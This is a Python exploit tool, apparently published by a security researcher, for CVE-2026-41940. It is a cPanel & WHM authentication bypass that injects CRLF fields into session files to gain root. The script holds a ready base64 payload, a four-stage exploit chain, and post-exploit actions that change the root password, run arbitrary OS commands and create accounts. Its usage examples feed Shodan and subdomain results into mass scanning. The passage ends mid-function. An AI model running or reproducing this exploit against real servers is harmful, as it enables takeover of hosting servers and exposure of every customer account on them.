1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
| #!/usr/bin/env python3
# DISCLAIMER: For authorized security research only.
# -*- coding: utf-8 -*-
"""
cPanelSniper.py — CVE-2026-41940 cPanel & WHM Auth Bypass Scanner
Author : Mitsec (@ynsmroztas)
Version : 2.0
CVE-2026-41940: Session-File CRLF Injection → WHM Root Authentication Bypass
saveSession() calls filter_sessiondata() AFTER writing the session file.
CRLF chars in the Authorization Basic header poison the on-disk session with
attacker-controlled fields (hasroot=1, tfa_verified=1, etc.)
Exploit Chain (4 stages):
[0] Auto-discover canonical hostname via /openid_connect/cpanelid 307
[1] POST /login/?login_only=1 wrong creds → preauth session cookie
[2] GET / + CRLF-poisoned Authorization: Basic → session file poisoned
[3] GET /scripts2/listaccts → triggers do_token_denied gadget (raw→cache flush)
[4] GET /{{token}}/json-api/version → 200 + version = ROOT ACCESS CONFIRMED
Post-Exploit:
--action passwd → Change root password via WHM API
--action cmd → Execute arbitrary commands via /json-api/scripts/exec
--action adduser → Create new WHM account
--action list → List all cPanel accounts
Affected : cPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 /
11.132.0.29 / 11.134.0.20 / 11.136.0.5
Fixed : filter_sessiondata() moved before session write in Session.pm
CVSS : 10.0 Critical | In-the-wild exploitation confirmed (Apr 2026)
Usage:
python3 cPanelSniper.py -u https://target.com:2087
python3 cPanelSniper.py -u https://target.com:2087 --action list
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd Mitsec@2026!
python3 cPanelSniper.py -l targets.txt -t 20 -o results.json
cat urls.txt | python3 cPanelSniper.py
subfinder -d target.com | httpx -p 2087 -silent | python3 cPanelSniper.py
shodan search --fields ip_str,port 'title:"WHM Login"' | \\
awk '{print "https://"$1":"$2}' | python3 cPanelSniper.py -t 30
stdlib only — no pip required.
"""
import sys, os, re, json, ssl, signal, argparse, threading, time
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
from urllib.parse import (urlsplit, quote, unquote, urlencode,
urlparse, parse_qs)
from collections import defaultdict
import urllib.request, urllib.error
# ══════════════════════════════════════════════════════════════
# COLORS
# ══════════════════════════════════════════════════════════════
class C:
RED = "\033[91m"; GREEN = "\033[92m"; YELLOW = "\033[93m"
BLUE = "\033[94m"; PURPLE = "\033[95m"; CYAN = "\033[96m"
BOLD = "\033[1m"; DIM = "\033[2m"; RESET = "\033[0m"
ORANGE = "\033[38;5;208m"
LOG_LOCK = threading.Lock()
PRINT_LOCK = threading.Lock()
def ts():
return datetime.now().strftime("%H:%M:%S")
def log(level, msg, target=""):
icons = {
"CRIT": f"{C.RED}{C.BOLD}[CRIT]{C.RESET}",
"HIGH": f"{C.RED}[HIGH]{C.RESET}",
"INFO": f"{C.BLUE}[INFO]{C.RESET}",
"OK": f"{C.GREEN}[ OK]{C.RESET}",
"ERR": f"{C.DIM}[ ERR]{C.RESET}",
"SKIP": f"{C.DIM}[SKIP]{C.RESET}",
"SCAN": f"{C.PURPLE}[SCAN]{C.RESET}",
"STEP": f"{C.CYAN}[{level:>4}]{C.RESET}",
"PWNED": f"{C.RED}{C.BOLD}[PWND]{C.RESET}",
"WARN": f"{C.YELLOW}[WARN]{C.RESET}",
"API": f"{C.ORANGE}[ API]{C.RESET}",
}.get(level, f"[{level:>4}]")
t = f" {C.DIM}{target}{C.RESET}" if target else ""
with LOG_LOCK:
print(f"{C.DIM}{ts()}{C.RESET} {icons} {msg}{t}", file=sys.stderr, flush=True)
def safe_print(msg):
with PRINT_LOCK:
print(msg, flush=True)
def banner():
print(f"""{C.ORANGE}{C.BOLD}
██████╗██████╗ █████╗ ███╗ ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗ ██║██╔════╝██║
██║ ██████╔╝███████║██╔██╗██║█████╗ ██║
██║ ██╔═══╝ ██╔══██║██║╚████║██╔══╝ ██║
╚██████╗██║ ██║ ██║██║ ╚███║███████╗███████╗
╚═════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚══╝╚══════╝╚══════╝{C.RESET}
{C.BOLD}███████╗███╗ ██╗██╗██████╗ ███████╗██████╗{C.RESET}
{C.BOLD}██╔════╝████╗ ██║██║██╔══██╗██╔════╝██╔══██╗{C.RESET}
{C.BOLD}███████╗██╔██╗██║██║██████╔╝█████╗ ██████╔╝{C.RESET}
{C.BOLD}╚════██║██║╚████║██║██╔═══╝ ██╔══╝ ██╔══██╗{C.RESET}
{C.BOLD}███████║██║ ╚███║██║██║ ███████╗██║ ██║{C.RESET}
{C.BOLD}╚══════╝╚═╝ ╚══╝╚═╝╚═╝ ╚══════╝╚═╝ ╚═╝{C.RESET}
{C.CYAN} CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection{C.RESET}
{C.DIM} 4-stage: preauth → CRLF inject → propagate → verify → post-exploit{C.RESET}
{C.RED} In-The-Wild | CVSS 10.0 | By Mitsec (@ynsmroztas){C.RESET}
""")
# ══════════════════════════════════════════════════════════════
# CRLF PAYLOAD
# ══════════════════════════════════════════════════════════════
# Decodes to:
# root:x\r\n
# successful_internal_auth_with_timestamp=9999999999\r\n
# user=root\r\n
# tfa_verified=1\r\n
# hasroot=1
# Fields written directly into the session file, bypassing auth check
PAYLOAD_B64 = (
"cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5"
"OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x"
)
# Patched versions
PATCHED = {
"110": ("11.110.0.97", 97),
"118": ("11.118.0.63", 63),
"126": ("11.126.0.54", 54),
"132": ("11.132.0.29", 29),
"134": ("11.134.0.20", 20),
"136": ("11.136.0.5", 5),
}
# ══════════════════════════════════════════════════════════════
# HTTP ENGINE — stdlib, raw Set-Cookie access preserved
# ══════════════════════════════════════════════════════════════
class _SSLCtx:
_ctx = None
@classmethod
def get(cls):
if not cls._ctx:
c = ssl.create_default_context()
c.check_hostname = False
c.verify_mode = ssl.CERT_NONE
try: c.set_ciphers("DEFAULT:@SECLEVEL=1")
except: pass
cls._ctx = c
return cls._ctx
BASE_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/146.0.0.0 Safari/537.36")
class R:
"""Thin response wrapper"""
def __init__(self, status, body, headers, url, raw_cookies=""):
self.status = status
self.body = body
self.headers = headers # lowercase keys, last value wins
self.url = url
self.raw_cookies = raw_cookies # raw Set-Cookie header(s)
def h(self, k, default=""):
return self.headers.get(k.lower(), default)
def location(self):
return self.h("location")
def raw_cookie(self, name):
"""Extract raw (URL-encoded) value of named cookie from Set-Cookie"""
for line in self.raw_cookies.split("\n"):
if line.lower().startswith(name.lower() + "="):
v = line.split("=", 1)[1].split(";", 1)[0].strip()
return v
return ""
class _NoRedir(urllib.request.HTTPErrorProcessor):
def http_response(self, req, r): return r
https_response = http_response
def _do(url, method="GET", extra_headers=None, data=None, timeout=15,
follow=False, canonical_host=None):
parsed = urlparse(url)
h = {
"User-Agent": BASE_UA,
"Accept": "*/*",
"Connection": "close",
}
# Spoof Host to canonical if provided (avoids redirect loops)
if canonical_host:
port = parsed.port or (443 if parsed.scheme=="https" else 80)
h["Host"] = f"{canonical_host}:{port}" if port not in (80,443) \
else canonical_host
if extra_headers:
h.update(extra_headers)
body_bytes = None
if data:
if isinstance(data, dict):
body_bytes = urlencode(data).encode()
h.setdefault("Content-Type", "application/x-www-form-urlencoded")
elif isinstance(data, str):
body_bytes = data.encode()
else:
body_bytes = data
if follow:
opener = urllib.request.build_opener(
urllib.request.HTTPSHandler(context=_SSLCtx.get()))
else:
opener = urllib.request.build_opener(
urllib.request.HTTPSHandler(context=_SSLCtx.get()), _NoRedir())
opener.addheaders = []
try:
req = urllib.request.Request(url, data=body_bytes,
headers=h, method=method)
with opener.open(req, timeout=timeout) as resp:
body_bytes_out = resp.read()
body = body_bytes_out.decode("utf-8", errors="replace")
rh = {}
raw_ck = []
for k, v in resp.headers.items():
rh[k.lower()] = v
if k.lower() == "set-cookie":
raw_ck.append(v)
return R(resp.status, body, rh, resp.url, "\n".join(raw_ck))
except urllib.error.HTTPError as e:
try: body = e.read().decode("utf-8", errors="replace")
except: body = ""
rh = {k.lower(): v for k,v in e.headers.items()} if hasattr(e,"headers") else {}
raw_ck = []
if hasattr(e, "headers"):
for k,v in e.headers.items():
if k.lower() == "set-cookie":
raw_ck.append(v)
return R(e.code, body, rh, url, "\n".join(raw_ck))
except Exception as ex:
return R(0, str(ex), {}, url, "")
# ══════════════════════════════════════════════════════════════
# TARGET PARSING
# ══════════════════════════════════════════════════════════════
def parse_target(url: str) -> tuple:
if "://" not in url:
url = "https://" + url
u = urlsplit(url.rstrip("/"))
scheme = u.scheme or "https"
host = u.hostname or url
port = u.port or 2087
return scheme, host, port
def build_url(scheme, host, port, path):
if (scheme == "https" and port == 443) or (scheme == "http" and port == 80):
return f"{scheme}://{host}{path}"
return f"{scheme}://{host}:{port}{path}"
def is_version_patched(version: str):
m = re.match(r"11\.(\d+)\.(\d+)\.(\d+)", version)
if not m:
return None
branch, patch, build = m.group(1), int(m.group(2)), int(m.group(3))
if branch in PATCHED:
_, patched_build = PATCHED[branch]
return build >= patched_build
return None
# ══════════════════════════════════════════════════════════════
# STAGE 0 — Canonical hostname discovery
# ══════════════════════════════════════════════════════════════
def stage0_canonical(scheme, host, port, timeout) -> str:
"""
cpsrvd 307s to the correct hostname when our Host is wrong.
GET /openid_connect/cpanelid → Location: https://<real-host>:port/...
"""
url = build_url(scheme, host, port, "/openid_connect/cpanelid")
resp = _do(url, timeout=timeout, follow=False)
loc = resp.location()
m = re.match(r"^https?://([^:/]+)", loc)
if m:
canonical = m.group(1)
log("INFO", f"Canonical hostname discovered: {canonical}")
return canonical
return host # fallback
# ══════════════════════════════════════════════════════════════
# STAGE 1 — Mint preauth session
# ══════════════════════════════════════════════════════════════
def stage1_preauth(scheme, host, port, canonical, timeout) -> str:
"""
POST /login/?login_only=1 wrong creds → 401 + whostmgrsession cookie.
Session name extracted from raw Set-Cookie (before %2C / comma).
"""
url = build_url(scheme, host, port, "/login/?login_only=1")
resp = _do(url, method="POST",
data={"user": "root", "pass": "wrong"},
timeout=timeout,
canonical_host=canonical)
if resp.status not in (200, 401):
log("ERR", f"Stage1: unexpected status {resp.status}")
return None
# Get raw Set-Cookie to preserve URL-encoding
raw_ck = resp.raw_cookie("whostmgrsession")
if not raw_ck:
# Fallback: check header directly
raw_ck = resp.h("set-cookie")
m = re.search(r'whostmgrsession=([^;,\s]+)', raw_ck, re.IGNORECASE)
raw_ck = m.group(1) if m else ""
if not raw_ck:
log("ERR", "Stage1: no whostmgrsession cookie received")
return None
# URL-decode to get :SessionName,ObHex format
decoded = unquote(raw_ck)
# Strip the ",<obhex>" tail — this makes the encoder skip pass in stage2
if "," in decoded:
session_base = decoded.split(",", 1)[0]
else:
session_base = decoded
log("OK", f"Stage1: preauth session = {session_base[:35]}...", "")
return session_base
# ══════════════════════════════════════════════════════════════
# STAGE 2 — CRLF injection
# ══════════════════════════════════════════════════════════════
def stage2_inject(scheme, host, port, canonical, session_base, timeout) -> str:
"""
GET / with CRLF-poisoned Authorization: Basic header.
cpsrvd reads Basic auth value, writes it into session file → CRLF fields injected.
Response: 307 Location: /cpsessXXXXXXXXXX/...
"""
cookie_enc = quote(session_base)
url = build_url(scheme, host, port, "/")
resp = _do(url, method="GET",
extra_headers={
"Authorization": f"Basic {PAYLOAD_B64}",
"Cookie": f"whostmgrsession={cookie_enc}",
},
timeout=timeout,
canonical_host=canonical)
loc = resp.location()
m = re.search(r"/cpsess(\d{10})", loc)
if not m:
log("ERR", f"Stage2: no /cpsess token in redirect (HTTP {resp.status})")
if loc:
log("WARN", f"Stage2: Location={loc[:80]}")
return None
token = f"/cpsess{m.group(1)}"
log("OK", f"Stage2: HTTP {resp.status} → token={token}")
return token
# ══════════════════════════════════════════════════════════════
# STAGE 3 — Propagate (do_token_denied gadget)
# ══════════════════════════════════════════════════════════════
def stage3_propagate(scheme, host, port, canonical, session_base, timeout) -> bool:
"""
GET /scripts2/listaccts fires the do_token_denied internal gadget.
This flushes the raw session file into the session cache — without this
step the injected fields are not yet active.
Expected: 401 with "Token denied" or "WHM Login" in body.
"""
cookie_enc = quote(session_base)
url = build_url(scheme, host, port, "/scripts2/listaccts")
resp = _do(url, method="GET",
extra_headers={"Cookie": f"whostmgrsession={cookie_enc}"},
timeout=timeout,
canonical_host=canonical)
body = resp.body or ""
if resp.status == 401 and any(x in body for x in
["Token denied", "WHM Login", "login"]):
log("OK", f"Stage3: HTTP {resp.status} — do_token_denied gadget fired")
return True
# Accept 200 too — some configs show the page instead
if resp.status in (200, 301, 302, 307):
log("OK", f"Stage3: HTTP {resp.status} — propagation likely fired")
return True
log("WARN", f"Stage3: unexpected HTTP {resp.status} — continuing anyway")
return True # don't abort — sometimes this step behaves differently
# ══════════════════════════════════════════════════════════════
# STAGE 4 — Verify WHM root access
# ══════════════════════════════════════════════════════════════
def stage4_verify(scheme, host, port, canonical, session_base, token, timeout) -> dict:
"""
GET /{{token}}/json-api/version → 200 + version data = auth bypass confirmed.
Also accepts 500/503 with "License" (past auth, license-gated only).
"""
cookie_enc = quote(session_base)
url = build_url(scheme, host, port, f"{token}/json-api/version")
resp = _do(url, method="GET",
extra_headers={"Cookie": f"whostmgrsession={cookie_enc}"},
timeout=timeout,
canonical_host=canonical)
body = (resp.body or "").strip()
log("INFO", f"Stage4: HTTP {resp.status} {body[:100]}")
if resp.status == 200 and '"version"' in body:
version = ""
m = re.search(r'"version"\s*:\s*"([^"]+)"', body)
if m:
version = m.group(1)
return {"confirmed": True, "version": version, "body": body[:600]}
# License-gated but auth passed
if resp.status in (500, 503) and "License" in body:
return {"confirmed": True, "version": "unknown (license-gated)",
"body": body[:300]}
return {"confirmed": False}
# ══════════════════════════════════════════════════════════════
# WHM API CALLER
# ══════════════════════════════════════════════════════════════
def whm_api(scheme, host, port, canonical, session_base, token,
function, params, timeout):
"""Call authenticated WHM JSON API"""
cookie_enc = quote(session_base)
qs = "api.version=1"
for k, v in params.items():
if v is not None:
qs += f"&{quote(str(k))}={quote(str(v))}"
path = f"{token}/json-api/{function}?{qs}"
url = build_url(scheme, host, port, path)
resp = _do(url, method="GET",
extra_headers={"Cookie": f"whostmgrsession={cookie_enc}"},
timeout=timeout,
canonical_host=canonical)
log("API", f"{function} → HTTP {resp.status}")
try:
j = json.loads(resp.body)
return resp.status, j
except Exception:
return resp.status, resp.body
# ══════════════════════════════════════════════════════════════
# POST-EXPLOIT ACTIONS
# ══════════════════════════════════════════════════════════════
def action_list_accounts(ctx):
"""List all cPanel accounts"""
log("API", "Listing all cPanel accounts...")
s, data = whm_api(*ctx[:6], "listaccts", {"search": "", "searchtype": "user"}, ctx[6])
if isinstance(data, dict):
accts = data.get("data", {}).get("acct", [])
if accts:
log("OK", f"Found {len(accts)} cPanel accounts:")
for a in accts:
safe_print(f" {C.GREEN} user={a.get('user','?'):20s} "
f"domain={a.get('domain','?'):30s} "
f"email={a.get('email','?')}{C.RESET}")
else:
safe_print(str(data)[:1000])
else:
safe_print(str(data)[:1000])
def action_change_passwd(ctx, new_password):
"""Change root password"""
log("API", "Changing root password")
s, data = whm_api(*ctx[:6], "passwd",
{"user": "root", "password": new_password}, ctx[6], ctx[-1])
safe_print(json.dumps(data, indent=2)[:800] if isinstance(data, dict)
else str(data)[:800])
def action_exec_cmd(ctx, cmd):
"""Execute OS command via WHM exec API"""
log("API", f"Executing command: {cmd}")
s, data = whm_api(*ctx[:6], "scripts/exec",
{"command": cmd}, ctx[6])
if isinstance(data, dict):
output = data.get("data", {}).get("output",
data.get("metadata", {}).get("reason", str(data)))
safe_print(f"\n{C.GREEN}{output}{C.RESET}")
else:
safe_print(str(data)[:800])
def action_server_info(ctx):
"""Get server info via multiple lightweight endpoints"""
log("API", "Gathering server info (license-safe endpoints)...")
scheme, host, port, canonical, session_base, token, timeout = ctx
info = {}
for ep, params, label in [
("gethostname", {}, "hostname"),
("loadavg", {}, "load"),
("getdiskinfo", {}, "disk"),
("getmysqlhost", {}, "mysql_host"),
("listresellers", {}, "resellers"),
("version", {}, "version"),
]:
s, data = whm_api(*ctx[:6], ep, params, timeout)
|